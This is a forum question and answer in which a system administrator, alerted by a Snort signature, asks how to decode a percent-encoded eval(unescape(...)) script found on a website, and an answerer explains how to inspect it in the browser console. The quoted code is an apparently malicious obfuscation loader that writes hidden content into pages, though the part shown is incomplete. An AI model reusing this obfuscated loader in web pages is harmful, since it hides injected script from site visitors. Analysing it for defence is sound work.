# Decoding hex encoded/obfucated javascript

Tags: javascript, encoding, decoding

I'm a SysAdmin that doesn't know much about javascript.

I recently started running Snort on a network and it gave me the alert "ET WEB_CLIENT Hex Obfuscation of document.write % Encoding" on a website one of my users visited. Looking at the Snort rule and the html/javascript on the site I was able to find the following that I think triggered the rule:

```
eval(unescape("%66%75%6e%63%74%69%6f%6e%20%52%73%52%73%52%73%52%73%28%74%65%61%61%62%62%29%20%7b%76%61%72%20%74%74%74%6d%6d%6d%3d%22%22%3b%6c%3d%74%65%61%61%62%62%2e%6c%65%6e%67%74%68%3b%77%77%77%3d%68%68%68%68%66%66%66%66%3d%4d%61%74%68%2e%72%6f%75%6e%64%28%6c%2f%32%29%3b%69%66%28%6c%3c%32%2a%77%77%77%29%09%68%68%68%68%66%66%66%66%3d%68%68%68%68%66%66%66%66%2d%31%3b%66%6f%72%28%69%3d%30%3b%69%3c%68%68%68%68%66%66%66%66%3b%69%2b%2b%29%74%74%74%6d%6d%6d%20%3d%20%74%74%74%6d%6d%6d%20%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%69%29%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%69%2b%68%68%68%68%66%66%66%66%29%3b%69%66%28%6c%3c%32%2a%77%77%77%29%20%74%74%74%6d%6d%6d%20%3d%20%74%74%74%6d%6d%6d%20%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%6c%2d%31%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%74%74%74%6d%6d%6d%29%3b%7d%3b%52%73%52%73%52%73%52%73%28%77%6c%6b%6a%69%29%3b"));
```

I ran that block of javascript through a HexDecoder (http://ddecode.com/hexdecoder/) and got the following:

```
eval(unescape("function RsRsRsRs(teaabb) {var tttmmm="";l=teaabb.length;www=hhhhffff=Math.round(l/2);if(l<2*www)    hhhhffff=hhhhffff-1;for(i=0;i<hhhhffff;i++)tttmmm = tttmmm + teaabb.charAt(i)+ teaabb.charAt(i+hhhhffff);if(l<2*www) tttmmm = tttmmm + teaabb.charAt(l-1);document.write(tttmmm);};RsRsRsRs(wlkji);"));
```

Can anyone point me in the right direction to continue decoding this to determine what it might be doing?

Answer (score 0):

> Can anyone point me in the right direction...

Just open your browser's web console and paste it in, **without** the `eval(` at the beginning and the final `)` at the end. That will show you the code it's trying to run, without running it.

You can take it further by taking the resulting

```
function RsRsRsRs(teaabb) {
    var tttmmm = "";
    l = teaabb.length;
    www = hhhhffff = Math.round(l / 2);
    if (l < 2 * www) hhhhffff = hhhhffff - 1;
    for (i = 0; i < hhhhffff; i++) tttmmm = tttmmm + teaabb.charAt(i) + teaabb.charAt(i + hhhhffff);
    if (l < 2 * www) tttmmm = tttmmm + teaabb.charAt(l - 1);
    document.write(tttmmm);
};
RsRsRsRs(wlkji);
```

...which defines and then calls a function and changing the `document.write` part of it to `console.log`, so you can see what it's trying to put into the document.

But there must be more to it, as the end is trying to use a variable that doesn't exist.